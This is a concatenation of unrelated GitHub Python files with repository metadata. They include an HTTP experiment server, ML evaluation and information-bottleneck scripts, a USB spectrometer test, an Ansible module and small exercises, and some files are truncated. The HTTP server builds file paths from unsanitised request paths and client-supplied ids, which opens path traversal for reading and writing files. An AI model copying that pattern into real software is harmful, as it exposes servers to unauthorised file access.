76b0fd7724eacc43e16f04dc7b6e1083bdea1093 | f77053d493df5b064316e038ecd42e9dc9f416c5 | /experiment_receiver.py | 092b10f1eda401c6f62527af458741d32515aac9 | [] | no_license | osabuoun/jqueuer_manager | 0269b3144fbe1a8934d4e83c55f790a8b4ebe159 | d178a2186c5297aa6561e1c44f5cfd67f0d2fcfd | refs/heads/master | 2021-09-14T22:34:18.242176 | 2018-03-28T10:58:01 | 2018-03-28T10:58:01 | 113,175,580 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,937 | py | from http.server import BaseHTTPRequestHandler, HTTPServer
import urllib.parse, json, time, ast, random
from pprint import pprint
from threading import Thread
from experiment import Experiment
def add_experiment(experiment_json):
print("-------------------------------------------")
print(str(experiments))
print("-------------------------------------------")
output = "experiment_json: " + str(experiment_json)
private_id = str(int(round(time.time() * 1000))) + "_" + str(random.randrange(100, 999))
experiment_id = "exp_" + private_id
experiment = Experiment(experiment_id, private_id, experiment_json)
experiment_thread = Thread(target = experiment.start, args = ())
experiment_thread.start()
experiments[experiment_id] = {'experiment': experiment, 'thread': experiment_thread}
print(output)
return str(experiment_id) + " has been added & started successfully ! \n"
def del_experiment(experiment_json):
customer_service_name = experiment_json['service_name']
if (backend_experiment_db.exists(customer_service_name)):
backend_experiment_db.delete(customer_service_name)
return "Customer Service " + customer_service_name + " has been removed from the queue" + "\n"
return "Customer Service " + customer_service_name + " wasn't found in the queue" + "\n"
class HTTP(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
data = None
binary = None
response = "Error 404"
try:
if (self.path == '/'):
html_file = open('./index.html','rb')
response = html_file.read()
html_file.close()
self._set_headers()
print(response)
self.wfile.write(response)
print("-----------------------------------------")
return
else:
html_file = open('.' + self.path + '.html','r')
response = html_file.read()
html_file.close()
binary = bytes(json.dumps(response),"utf-8")
self._set_headers()
self.wfile.write(binary)
except Exception as e:
print(str(e))
pass
def do_HEAD(self):
self._set_headers()
def do_POST(self):
#pprint(vars(self))
# Doesn't do anything with posted data
content_length= None
data_json = None
data =None
try:
content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
data = self.rfile.read(int(content_length)).decode('utf-8')
print('data : ' + str(data))
data_json = ast.literal_eval(data)
#print(data_json['service_name'])
pass
except Exception as e:
print("Error in parsing the content_length and packet data")
data_back = ""
if (self.path == '/experiment/result'):
#data_json = json.load(data)
print('data_json' + str(data_json))
html_file = open('./' + data_json['id'] + '.html','a')
text = '<hr>Received from {} at {}: Params: {} '.format(
str(self.client_address),
str(time.time()),
str(data_json)
)
html_file.write(text)
html_file.close()
data_back = "received"
print("------------------/experiment/result---------------")
if (self.path == '/experiment/add'):
print(str(data_json))
data_back = add_experiment(data_json)
print("------------------/experiment/add---------------")
elif (self.path == '/experiment/del'):
print(str(data_json))
data_back = del_experiment(data_json)
print("------------------/experiment/del---------------")
self._set_headers()
self.wfile.write(bytes(str(data_back), "utf-8"))
def start(experiments_arg, port=8081):
global experiments
experiments = experiments_arg
server_address = ('', port)
httpd = HTTPServer(server_address, HTTP)
print('Starting Experiment Manager HTTP Server...' + str(port))
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("***** Error in Experiment Manager HTTP Server *****")
pass
httpd.server_close()
print(time.asctime(), "Experiment Manager Server Stopped - %s:%s" % (server_address, port))
| [
"oabuoun1"
] | oabuoun1 |
16241caf95d6f2f6a2c327e2309ad58990c11cd5 | be549921446835ba6dff0cadaa0c7b83570ebc3e | /run_eval_sutter.py | a0ba2df9ac3c6f63655586a070cc69f7762854c8 | [] | no_license | uctoronto/AutoPrescribe | 895ee4375625408c663cee22610bb5425d7efc7f | a6188e9189df727320448a368f6e70036472ede4 | refs/heads/master | 2020-03-27T05:47:47.500486 | 2017-05-31T18:49:33 | 2017-05-31T18:49:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,227 | py | from models.processor import Processor
from models.leap import LEAPModel
from exp.coverage import config_sutter as config
from utils.data import dump
config = config.get_config()
dir = 'build/'
config.saved_model_file = dir + 'sutter_%s_%s_seq2seq.model' % (config.level, config.order)
print(config.saved_model_file.split('/')[-1])
p = Processor(config)
model = LEAPModel(p, config)
# model.do_train()
model.load_params(config.saved_model_file)
# model.do_reinforce(scorer)
model.do_eval(training = False, filename = 'sutter_%s_%s_seq2seq.txt' % (config.level, config.order), max_batch = 5000000)
# model.load_params('../models/resume_seed13_100d_lr0.001_h256.model')
# ret = model.do_generate(data)
#
# from utils.eval import Evaluator
# eva = Evaluator()
# cnt = 0
# truth = []
# sum_jaccard = 0
# for line in open("seq2seq.h256.txt"):
# if cnt % 3 == 1:
# truth = set(line.strip().split("T: ")[1].split(" "))
# if cnt % 3 == 2:
# result = set(line.strip().split("Gen: ")[1].replace("END", "").strip().split(" "))
# jaccard = eva.get_jaccard_k(truth, result)
# sum_jaccard += jaccard
# cnt += 1
#
# print(sum_jaccard * 3 / cnt)
#
# cnt = 0
# truth_list = []
# prediction_list = []
# for line in open("seq2seq.h256.txt"):
# if cnt % 3 == 1:
# truth = set(line.strip().split("T: ")[1].split(" "))
# truth_list.append(truth)
# if cnt % 3 == 2:
# result = set(line.strip().split("Gen: ")[1].replace("END", "").strip().split(" "))
# prediction_list.append(result)
# cnt += 1
#
cnt = 0
results = []
input = []
truth = []
for line in open('sutter_%s_%s_seq2seq.txt' % (config.level, config.order)):
if cnt % 3 == 0:
input = set(line.strip().split("S: ")[1].split(" "))
if cnt % 3 == 1:
if len(line.strip().split("T: ")) <= 1:
truth = []
continue
truth = set(line.strip().split("T: ")[1].split(" "))
if cnt % 3 == 2:
result = set(line.strip().split("Gen: ")[1].replace("END", "").strip().split(" "))
if len(truth) > 0:
results.append((input, truth, result))
cnt += 1
dump(results, "sutter_%s_%s_result_seq2seq.pkl" % (config.level, config.order)) | [
"stack@live.cn"
] | stack@live.cn |
991dca36ac04de7fc66617c9dc6b5b69955f62de | 175522feb262e7311fde714de45006609f7e5a07 | /code/OCE/oce_ba_toy.py | b0d5e7d5d33e9d60e03b134751d925d68012207c | [] | no_license | m-hahn/predictive-rate-distortion | a048927dbc692000211df09da09ad1ed702525df | 1ff573500a2313e0a79d68399cbd83970bf05e4d | refs/heads/master | 2020-04-17T13:49:36.961798 | 2019-06-20T12:37:28 | 2019-06-20T12:37:28 | 166,631,865 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,806 | py | # Computes estimates also from held-out data.
# Was called zNgramIB_5.py.
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--language", type=str, dest="language", default="RIP")
parser.add_argument("--horizon", type=int, dest="horizon", default=1)
parser.add_argument("--code_number", type=int, dest="code_number", default=100)
parser.add_argument("--beta", type=float, dest="beta", default=0.1)
parser.add_argument("--dirichlet", type=float, dest="dirichlet", default=0.00001)
args_names = ["language", "horizon", "code_number", "beta", "dirichlet"]
args = parser.parse_args()
args.beta = 1/args.beta
assert args.beta <= 1.0
import random
import sys
header = ["index", "word", "lemma", "posUni", "posFine", "morph", "head", "dep", "_", "_"]
from corpusIteratorToy import CorpusIteratorToy
ngrams = {}
lastPosUni = ("EOS",)*(2*args.horizon-1)
for sentence in CorpusIteratorToy(args.language,"train", storeMorph=True).iterator():
for line in sentence:
nextPosUni = line["posUni"]
ngram = lastPosUni+(nextPosUni,)
ngrams[ngram] = ngrams.get(ngram, 0) + 1
lastPosUni = lastPosUni[1:]+(nextPosUni,)
nextPosUni = "EOS"
ngram = lastPosUni+(nextPosUni,)
ngrams[ngram] = ngrams.get(ngram, 0) + 1
lastPosUni = lastPosUni[1:]+(nextPosUni,)
#import torch.distributions
import torch.nn as nn
import torch
from torch.autograd import Variable
ngrams = list(ngrams.iteritems())
#ngrams = [x for x in ngrams if x[1] > 100]
#print(ngrams)
print(["Number of ngrams", len(ngrams)])
keys = [x[0] for x in ngrams]
total = sum([x[1] for x in ngrams])
frequencies = [x[1] for x in ngrams]
pasts = [x[:args.horizon] for x in keys] #range(horizon:range(horizon, 2*horizon)]
futures = [x[args.horizon:] for x in keys]
itos_pasts = list(set(pasts)) + ["_OOV_"]
itos_futures = list(set(futures)) + ["_OOV_"]
stoi_pasts = dict(zip(itos_pasts, range(len(itos_pasts))))
stoi_futures = dict(zip(itos_futures, range(len(itos_futures))))
import torch
pasts_int = torch.LongTensor([stoi_pasts[x] for x in pasts])
futures_int = torch.LongTensor([stoi_futures[x] for x in futures])
marginal_past = torch.zeros(len(itos_pasts))
for i in range(len(pasts)):
marginal_past[pasts_int[i]] += frequencies[i]
marginal_past[-1] = args.dirichlet * len(itos_futures)
marginal_past = marginal_past.div(marginal_past.sum())
print(marginal_past)
print(len(marginal_past))
future_given_past = torch.zeros(len(itos_pasts), len(itos_futures))
for i in range(len(pasts)):
future_given_past[pasts_int[i]][futures_int[i]] = frequencies[i]
future_given_past[-1].fill_(args.dirichlet)
future_given_past[:,-1].fill_(args.dirichlet)
future_given_past += 0.00001
print(future_given_past.sum(1))
#quit()
future_given_past = future_given_past.div(future_given_past.sum(1).unsqueeze(1))
print(future_given_past[0].sum())
def logWithoutNA(x):
y = torch.log(x)
y[x == 0] = 0
return y
marginal_future = torch.zeros(len(itos_futures))
for i in range(len(futures)):
marginal_future[futures_int[i]] += frequencies[i]
marginal_future[-1] = args.dirichlet * len(itos_pasts)
marginal_future = marginal_future.div(marginal_future.sum())
print(marginal_future)
print(len(marginal_future))
encoding = torch.empty(len(itos_pasts), args.code_number).uniform_(0.000001, 1)
encoding = encoding.div(encoding.sum(1).unsqueeze(1))
decoding = torch.empty(args.code_number, len(itos_futures)).uniform_(0.000001, 1)
decoding = decoding.div(decoding.sum(1).unsqueeze(1))
print(decoding[0].sum())
#quit()
marginal_hidden = torch.matmul(marginal_past.unsqueeze(0), encoding).squeeze(0)
import torch.nn.functional
def runOCE():
global decoding
global encoding
global marginal_hidden
objective = 10000000
for t in range(500):
print("Iteration", t)
divergence_by_past = (future_given_past * logWithoutNA(future_given_past))
divergence_by_past = divergence_by_past.sum(1)
log_future_given_past = logWithoutNA(future_given_past)
log_decoding = logWithoutNA(decoding)
ratios = log_future_given_past.unsqueeze(1) - log_decoding.unsqueeze(0)
divergence2 = (future_given_past.unsqueeze(1) * ratios).sum(2)
total_distortion = torch.matmul(marginal_past.unsqueeze(0), divergence2 * encoding).sum()
assert total_distortion >= 0, total_distortion
logNewEncoding = logWithoutNA(marginal_hidden.unsqueeze(0)) + (-args.beta * divergence2)
logNewEncoding = torch.nn.functional.log_softmax( logNewEncoding, dim=1) # logNewEncoding - logNorm
newEncoding = torch.exp(logNewEncoding)
new_marginal_hidden = torch.matmul(marginal_past.unsqueeze(0), newEncoding).squeeze(0)
newEncodingInverted = (newEncoding * marginal_past.unsqueeze(1)).div(new_marginal_hidden.unsqueeze(0))
newEncodingInverted[new_marginal_hidden.unsqueeze(0).expand(len(itos_pasts), -1) == 0] = 0
newDecoding = torch.matmul(future_given_past.t(), newEncodingInverted).t()
assert abs(newDecoding[0].sum()) < 0.01 or abs(newDecoding[0].sum() - 1.0) < 0.01 , newDecoding[0].sum()
entropy = new_marginal_hidden * logWithoutNA(new_marginal_hidden)
entropy = -torch.sum(entropy)
print("Entropy", entropy)
encoding = newEncoding
decoding = newDecoding
marginal_hidden = new_marginal_hidden
logDecoding = logWithoutNA(decoding)
logFutureMarginal = logWithoutNA(marginal_future)
miWithFuture = torch.sum((decoding * (logDecoding - logFutureMarginal.unsqueeze(0))).sum(1) * marginal_hidden)
logEncoding = logWithoutNA(encoding)
log_marginal_hidden = logWithoutNA(marginal_hidden)
miWithPast = torch.sum((encoding * (logEncoding - log_marginal_hidden.unsqueeze(0))).sum(1) * marginal_past)
assert miWithFuture <= miWithPast+1e-5, (miWithFuture , miWithPast)
newObjective = 1/args.beta * miWithPast - miWithFuture
print(["Mi with future", miWithFuture, "Mi with past", miWithPast])
print(["objectives","last",objective, "new", newObjective])
if not (newObjective - 0.1 <= objective):
print ("WARNING: Objective not improving. ", newObjective, objective)
if newObjective == objective:
print("Ending")
break
objective = newObjective
return encoding, decoding, logDecoding, miWithPast, log_marginal_hidden
encoding, decoding, logDecoding, miWithPast_train, log_marginal_hidden = runOCE()
futureSurprisal_train = -((future_given_past * marginal_past.unsqueeze(1)).unsqueeze(1) * encoding.unsqueeze(2) * logDecoding.unsqueeze(0)).sum()
#assert False, "how is the vocabulary for held-out data generated????"
# try on held-out data
ngrams = {}
lastPosUni = ("EOS",)*(2*args.horizon-1)
for sentence in CorpusIteratorToy(args.language,"dev", storeMorph=True).iterator():
for line in sentence:
nextPosUni = line["posUni"]
ngram = lastPosUni+(nextPosUni,)
ngrams[ngram] = ngrams.get(ngram, 0) + 1
lastPosUni = lastPosUni[1:]+(nextPosUni,)
nextPosUni = "EOS"
ngram = lastPosUni+(nextPosUni,)
ngrams[ngram] = ngrams.get(ngram, 0) + 1
lastPosUni = lastPosUni[1:]+(nextPosUni,)
#import torch.distributions
import torch.nn as nn
import torch
from torch.autograd import Variable
ngrams = list(ngrams.iteritems())
#ngrams = [x for x in ngrams if x[1] > 100]
#print(ngrams)
#print(["Number of ngrams", len(ngrams)])
keys = [x[0] for x in ngrams]
total = sum([x[1] for x in ngrams])
frequencies = [x[1] for x in ngrams]
pasts = [x[:args.horizon] for x in keys] #range(horizon:range(horizon, 2*horizon)]
futures = [x[args.horizon:] for x in keys]
import torch
pasts_int = torch.LongTensor([stoi_pasts[x] if x in stoi_pasts else stoi_pasts["_OOV_"] for x in pasts])
futures_int = torch.LongTensor([stoi_futures[x] if x in stoi_futures else stoi_futures["_OOV_"] for x in futures])
marginal_past = torch.zeros(len(itos_pasts))
for i in range(len(pasts)):
marginal_past[pasts_int[i]] += frequencies[i]
#marginal_past[-1] = len(itos_futures)
marginal_past = marginal_past.div(marginal_past.sum())
future_given_past = torch.zeros(len(itos_pasts), len(itos_futures))
for i in range(len(pasts)):
future_given_past[pasts_int[i]][futures_int[i]] = frequencies[i]
#future_given_past[-1].fill_(1)
#future_given_past[:,-1].fill_(1)
future_given_past += 0.00001
future_given_past = future_given_past.div(future_given_past.sum(1).unsqueeze(1))
#marginal_future = torch.zeros(len(itos_futures))
#for i in range(len(futures)):
# marginal_future[futures_int[i]] += frequencies[i]
#marginal_future = marginal_future.div(marginal_future.sum())
marginal_hidden = torch.matmul(marginal_past.unsqueeze(0), encoding).squeeze(0)
logDecoding = logWithoutNA(decoding)
#logFutureMarginal = logWithoutNA(marginal_future)
futureSurprisal = -((future_given_past * marginal_past.unsqueeze(1)).unsqueeze(1) * encoding.unsqueeze(2) * logDecoding.unsqueeze(0)).sum()
logEncoding = logWithoutNA(encoding)
miWithPast = torch.sum((encoding * (logEncoding - log_marginal_hidden.unsqueeze(0))).sum(1) * marginal_past)
print(["Mi with past", miWithPast, "Future Surprisal", futureSurprisal/args.horizon, "Horizon", args.horizon]) # "Mi with future", miWithFuture
myID = random.randint(0,10000000)
outpath = "../../results/outputs-oce/estimates-"+args.language+"_"+__file__+"_model_"+str(myID)+".txt"
with open(outpath, "w") as outFile:
print >> outFile, "\t".join(x+" "+str(getattr(args,x)) for x in args_names)
print >> outFile, float(miWithPast)
print >> outFile, float(futureSurprisal/args.horizon)
print >> outFile, float(miWithPast_train)
print >> outFile, float(futureSurprisal_train/args.horizon)
print(outpath)
| [
"mhahn29@gmail.com"
] | mhahn29@gmail.com |
1e9a6d57604cd1c364504b455ee45ebb51105f26 | 79b798b6400287ae142d23427e299a1de0633d2e | /ARM/BatchTest.py | 49034fc7769627bf1e83933b3dbb48eeb2032c58 | [] | no_license | WasatchPhotonics/Python-USB-WP-Raman-Examples | 1c422448bc943eeb7f272868adb73e98896adf3c | eb6a7fc7a0a4a8f12dbde8782a119f21c60da974 | refs/heads/master | 2023-08-03T10:54:44.609911 | 2023-06-27T23:35:18 | 2023-06-27T23:35:18 | 82,347,610 | 0 | 2 | null | 2023-08-28T20:28:49 | 2017-02-17T23:42:14 | Python | UTF-8 | Python | false | false | 4,694 | py | #!/usr/bin/env python -u
################################################################################
# BatchTest.py #
################################################################################
# #
# DESCRIPTION: An extended version of SetTest.py which runs a set of simple #
# commands repeatedly against the spectrometer to generate #
# conditions of high traffic, for purposes of characterizing #
# communication issues under high load. #
# #
################################################################################
import sys
import usb.core
import datetime
from time import sleep
# select product
HOST_TO_DEVICE = 0x40
DEVICE_TO_HOST = 0xC0
BUFFER_SIZE = 8
ZZ = [0] * BUFFER_SIZE
TIMEOUT = 1000
VID = 0x24aa
PID = 0x4000 # 0x1000 = Silicon FX2, 0x2000 = InGaAs FX2, 0x4000 = ARM
def Get_Value(Command, ByteCount):
throttle_usb()
RetVal = 0
RetArray = dev.ctrl_transfer(DEVICE_TO_HOST, Command, 0, 0, ByteCount, TIMEOUT)
if RetArray is None or len(RetArray) < ByteCount:
return None
for i in range (0, ByteCount):
RetVal = RetVal*256 + RetArray[ByteCount - i - 1]
return RetVal
def Test_Set(SetCommand, GetCommand, SetValue, RetLen):
SetValueHigh = (SetValue >> 16) & 0xffff
SetValueLow = SetValue & 0xffff
FifthByte = (SetValue >> 32) & 0xff
ZZ[0] = FifthByte
throttle_usb()
Ret = dev.ctrl_transfer(HOST_TO_DEVICE, SetCommand, SetValueLow, SetValueHigh, ZZ, TIMEOUT)
if BUFFER_SIZE != Ret:
return ('Set {0:x} Fail'.format(SetCommand))
else:
RetValue = Get_Value(GetCommand, RetLen)
if RetValue is not None and SetValue == RetValue:
return ('Get 0x%04x Success: Txd:0x%04x == Rxd:0x%04x' % (GetCommand, SetValue, RetValue))
else:
Test_Set.errors += 1
return ('Get 0x%04x Failure: Txd:0x%04x != Rxd: %s' % (GetCommand, SetValue, RetValue))
Test_Set.errors = 0
def Get_FPGA_Revision():
throttle_usb()
buf = dev.ctrl_transfer(DEVICE_TO_HOST, 0xb4, 0, 0, 7, TIMEOUT)
s = ""
for c in buf:
s += chr(c)
return s
def throttle_usb():
if throttle_usb.delay_ms > 0:
if throttle_usb.last_usb_timestamp is not None:
next_usb_timestamp = throttle_usb.last_usb_timestamp + datetime.timedelta(milliseconds=throttle_usb.delay_ms)
if datetime.datetime.now() < next_usb_timestamp:
while datetime.datetime.now() < next_usb_timestamp:
sleep(0.001)
throttle_usb.last_usb_timestamp = datetime.datetime.now()
throttle_usb.count += 1
throttle_usb.last_usb_timestamp = None
throttle_usb.delay_ms = 0
throttle_usb.count = 0
# MZ: possibly relevant: https://bitbucket.org/benallard/galileo/issues/251/usbcoreusberror-errno-5-input-output-error
# def attempt_recovery():
# global dev
#
# print "resetting device"
# dev.reset()
# sleep(2)
#
# if True:
# dev = None
# sleep(2)
#
# print "re-enumerating USB"
# dev = usb.core.find(idVendor=VID, idProduct=PID)
# sleep(2)
#
# if dev is None:
# print "Failed to re-enumerate device"
# sys.exit()
#
# def reset_fpga():
# print "resetting FPGA"
# buf = [0] * 8
# dev.ctrl_transfer(HOST_TO_DEVICE, 0xb5, 0, 0, buf, TIMEOUT)
# sleep(2)
################################################################################
# main()
################################################################################
dev = usb.core.find(idVendor=VID, idProduct=PID)
if dev is None:
print "No spectrometers found."
sys.exit()
print dev
fpga_rev = Get_FPGA_Revision()
print 'FPGA Ver %s' % fpga_rev
print 'Testing Set Commands'
print "\nPress Ctrl-C to exit..."
iterations = 0
while True:
try:
print "Iteration %d: (%d errors)" % (iterations, Test_Set.errors)
print " Integration Time ", Test_Set(0xb2, 0xbf, 100, 6)
print " CCD Offset ", Test_Set(0xb6, 0xc4, 0, 2)
print " CCD Gain ", Test_Set(0xb7, 0xc5, 487, 2)
print " CCD TEC Enable ", Test_Set(0xd6, 0xda, 1, 1)
print " CCD TEC Disable ", Test_Set(0xd6, 0xda, 0, 1)
iterations += 1
except Exception as ex:
print "Caught exception after %d USB calls" % throttle_usb.count
print ex
sys.exit()
| [
"mark@zieg.com"
] | mark@zieg.com |
b5fdf682f928aef41c6625b6e5d1e70bb65baa49 | cfc49e6e65ed37ddf297fc7dffacee8f905d6aa0 | /exercicios_seccao4/35.py | f774259ca92b71fb8f2bb8f0eeece2cbe180ede4 | [] | no_license | IfDougelseSa/cursoPython | c94cc1215643f272f935d5766e7a2b36025ddbe2 | 3f9ceb9701a514106d49b2144b7f2845416ed8ec | refs/heads/main | 2023-06-12T16:51:29.413031 | 2021-07-07T00:20:53 | 2021-07-07T00:20:53 | 369,268,883 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 195 | py | # Hipotenusa
import math
a = int(input('Digite o cateto a: '))
b = int(input('Digite o cateto b: '))
hipotenusa = math.sqrt(a ** 2 + b ** 2)
print(f'O valor da hipotenusa é {hipotenusa}.')
| [
"doug_ccortez@outlook.com"
] | doug_ccortez@outlook.com |
bf61729fa718b439998532f367204e3cf8b93cf6 | 35fe9e62ab96038705c3bd09147f17ca1225a84e | /a10_ansible/library/a10_ipv6_neighbor_static.py | 9c058e6fee3024c46ed849ab350ff96c39149478 | [] | no_license | bmeidell/a10-ansible | 6f55fb4bcc6ab683ebe1aabf5d0d1080bf848668 | 25fdde8d83946dadf1d5b9cebd28bc49b75be94d | refs/heads/master | 2020-03-19T08:40:57.863038 | 2018-03-27T18:25:40 | 2018-03-27T18:25:40 | 136,226,910 | 0 | 0 | null | 2018-06-05T19:45:36 | 2018-06-05T19:45:36 | null | UTF-8 | Python | false | false | 6,211 | py | #!/usr/bin/python
REQUIRED_NOT_SET = (False, "One of ({}) must be set.")
REQUIRED_MUTEX = (False, "Only one of ({}) can be set.")
REQUIRED_VALID = (True, "")
DOCUMENTATION = """
module: a10_static
description:
-
author: A10 Networks 2018
version_added: 1.8
options:
ipv6-addr:
description:
- IPV6 address
mac:
description:
- MAC Address
ethernet:
description:
- Ethernet port (Port Value)
trunk:
description:
- Trunk group
tunnel:
description:
- Tunnel interface
vlan:
description:
- VLAN ID
uuid:
description:
- uuid of the object
"""
EXAMPLES = """
"""
ANSIBLE_METADATA = """
"""
# Hacky way of having access to object properties for evaluation
AVAILABLE_PROPERTIES = {"ethernet","ipv6_addr","mac","trunk","tunnel","uuid","vlan",}
# our imports go at the top so we fail fast.
from a10_ansible.axapi_http import client_factory
from a10_ansible import errors as a10_ex
def get_default_argspec():
return dict(
a10_host=dict(type='str', required=True),
a10_username=dict(type='str', required=True),
a10_password=dict(type='str', required=True, no_log=True),
state=dict(type='str', default="present", choices=["present", "absent"])
)
def get_argspec():
rv = get_default_argspec()
rv.update(dict(
ethernet=dict(
type='str'
),
ipv6_addr=dict(
type='str' , required=True
),
mac=dict(
type='str'
),
trunk=dict(
type='str'
),
tunnel=dict(
type='str'
),
uuid=dict(
type='str'
),
vlan=dict(
type='str' , required=True
),
))
return rv
def new_url(module):
"""Return the URL for creating a resource"""
# To create the URL, we need to take the format string and return it with no params
url_base = "/axapi/v3/ipv6/neighbor/static/{ipv6-addr}+{vlan}"
f_dict = {}
f_dict["ipv6-addr"] = ""
f_dict["vlan"] = ""
return url_base.format(**f_dict)
def existing_url(module):
"""Return the URL for an existing resource"""
# Build the format dictionary
url_base = "/axapi/v3/ipv6/neighbor/static/{ipv6-addr}+{vlan}"
f_dict = {}
f_dict["ipv6-addr"] = module.params["ipv6-addr"]
f_dict["vlan"] = module.params["vlan"]
return url_base.format(**f_dict)
def build_envelope(title, data):
return {
title: data
}
def build_json(title, module):
rv = {}
for x in AVAILABLE_PROPERTIES:
v = module.params.get(x)
if v:
rx = x.replace("_", "-")
rv[rx] = module.params[x]
return build_envelope(title, rv)
def validate(params):
# Ensure that params contains all the keys.
requires_one_of = sorted([])
present_keys = sorted([x for x in requires_one_of if params.get(x)])
errors = []
marg = []
if not len(requires_one_of):
return REQUIRED_VALID
if len(present_keys) == 0:
rc,msg = REQUIRED_NOT_SET
marg = requires_one_of
elif requires_one_of == present_keys:
rc,msg = REQUIRED_MUTEX
marg = present_keys
else:
rc,msg = REQUIRED_VALID
if not rc:
errors.append(msg.format(", ".join(marg)))
return rc,errors
def exists(module):
try:
module.client.get(existing_url(module))
return True
except a10_ex.NotFound:
return False
def create(module, result):
payload = build_json("static", module)
try:
post_result = module.client.post(new_url(module), payload)
result.update(**post_result)
result["changed"] = True
except a10_ex.Exists:
result["changed"] = False
except a10_ex.ACOSException as ex:
module.fail_json(msg=ex.msg, **result)
except Exception as gex:
raise gex
return result
def delete(module, result):
try:
module.client.delete(existing_url(module))
result["changed"] = True
except a10_ex.NotFound:
result["changed"] = False
except a10_ex.ACOSException as ex:
module.fail_json(msg=ex.msg, **result)
except Exception as gex:
raise gex
return result
def update(module, result):
payload = build_json("static", module)
try:
post_result = module.client.put(existing_url(module), payload)
result.update(**post_result)
result["changed"] = True
except a10_ex.ACOSException as ex:
module.fail_json(msg=ex.msg, **result)
except Exception as gex:
raise gex
return result
def present(module, result):
if not exists(module):
return create(module, result)
else:
return update(module, result)
def absent(module, result):
return delete(module, result)
def run_command(module):
run_errors = []
result = dict(
changed=False,
original_message="",
message=""
)
state = module.params["state"]
a10_host = module.params["a10_host"]
a10_username = module.params["a10_username"]
a10_password = module.params["a10_password"]
# TODO(remove hardcoded port #)
a10_port = 443
a10_protocol = "https"
valid, validation_errors = validate(module.params)
map(run_errors.append, validation_errors)
if not valid:
result["messages"] = "Validation failure"
err_msg = "\n".join(run_errors)
module.fail_json(msg=err_msg, **result)
module.client = client_factory(a10_host, a10_port, a10_protocol, a10_username, a10_password)
if state == 'present':
result = present(module, result)
elif state == 'absent':
result = absent(module, result)
return result
def main():
module = AnsibleModule(argument_spec=get_argspec())
result = run_command(module)
module.exit_json(**result)
# standard ansible module imports
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
if __name__ == '__main__':
main() | [
"mdurrant@a10networks.com"
] | mdurrant@a10networks.com |
38e09cdc7461baaa37f47bf8e665418601e4dee6 | 262dbc0c8a49d8e1801624d68f75423aa15260ba | /dnn/optimizers/optimizer.py | bce11287bbc40277af43ea09abf6e515577e8e9e | [] | no_license | mofeiyu/dnn | 9efc195929d76cb93115c23ca89b003a7dba0092 | ca39575a3138ae12156814e916ef20b8d20181e8 | refs/heads/master | 2021-05-14T23:06:11.684513 | 2017-11-20T15:57:03 | 2017-11-20T15:57:03 | 105,369,802 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py | #encode=utf-8
class Optimizer:
def __init__(self):
pass | [
"mofeiyu1110@foxmail.com"
] | mofeiyu1110@foxmail.com |
abc5fce9f81fd39237b6947e84495392b9671c0f | 06130291b603ea91c2d656e18ff9c086c2e0e4f2 | /A. Business trip.py | 76a1cebde36c71c8dcab0cdcf8a8af528ceeb501 | [] | no_license | rpask00/codeforces_py | 7ca6da163f3885e16b269f946fac6240d539d1b1 | afa2de05cd80e0015456c3f71634e74713811958 | refs/heads/main | 2023-04-17T07:43:54.414899 | 2021-05-01T16:04:15 | 2021-05-01T16:04:15 | 363,449,937 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 328 | py | import sys
k = int(input())
mths = list(map(int, input().split(' ')))
def solve(c, cnt, index):
if c <= 0:
return cnt
if index > 11:
return sys.maxsize
return min(solve(c-mths[index], cnt+1, index+1), solve(c, cnt, index+1))
res = solve(k, 0, 0)
if res == sys.maxsize:
res = -1
print(res)
| [
"rp.261000@gmail.com"
] | rp.261000@gmail.com |
c52b5a990a5ac6f28b3b6859230087f29c451146 | 01a62a9cbd1392a00d216f5c242931e592b3cc33 | /examples/vehicle_reads/functions/ingest/function.py | 6bd5167e202f2ae96e8aac24ed6ca998ccad2183 | [] | no_license | beaucronin/plausible | 3a8af9b90ea4ca263a4ac7efb89a00583af43f01 | 80cfe1bfd8fcc051206715186ad98a9b25f0ec3f | refs/heads/master | 2023-01-06T17:46:54.848980 | 2020-10-29T03:16:39 | 2020-10-29T03:16:39 | 295,292,222 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 140 | py | import plausible as pbl
def handler():
obj = pbl.function.current_trigger.payload
vehicle_id = obj["vehicle_id"]
vehicle_oem = | [
"beau.cronin@gmail.com"
] | beau.cronin@gmail.com |
26a00687d628fabeb7d90279726a75c457cbef7c | 636166c4aebbea24680c66f02e7ac0a4b58ab724 | /tasks.py | b999d53e911858878b19f127ad3ff99880b62003 | [
"MIT"
] | permissive | createchaos/arc_311_magic | ba5d308e0c927623135324a0e709f24558bad643 | e4f62bb6906dc6e7faa9bf3a3d5b0af0a604776f | refs/heads/master | 2023-01-04T07:17:17.690134 | 2020-11-04T19:54:51 | 2020-11-04T19:54:51 | 298,762,808 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,989 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import contextlib
import glob
import os
import sys
from shutil import rmtree
from invoke import Exit
from invoke import task
try:
input = raw_input
except NameError:
pass
BASE_FOLDER = os.path.dirname(__file__)
class Log(object):
def __init__(self, out=sys.stdout, err=sys.stderr):
self.out = out
self.err = err
def flush(self):
self.out.flush()
self.err.flush()
def write(self, message):
self.flush()
self.out.write(message + '\n')
self.out.flush()
def info(self, message):
self.write('[INFO] %s' % message)
def warn(self, message):
self.write('[WARN] %s' % message)
log = Log()
def confirm(question):
while True:
response = input(question).lower().strip()
if not response or response in ('n', 'no'):
return False
if response in ('y', 'yes'):
return True
print('Focus, kid! It is either (y)es or (n)o', file=sys.stderr)
@task(default=True)
def help(ctx):
"""Lists available tasks and usage."""
ctx.run('invoke --list')
log.write('Use "invoke -h <taskname>" to get detailed help for a task.')
@task(help={
'docs': 'True to clean up generated documentation, otherwise False',
'bytecode': 'True to clean up compiled python files, otherwise False.',
'builds': 'True to clean up build/packaging artifacts, otherwise False.'})
def clean(ctx, docs=True, bytecode=True, builds=True):
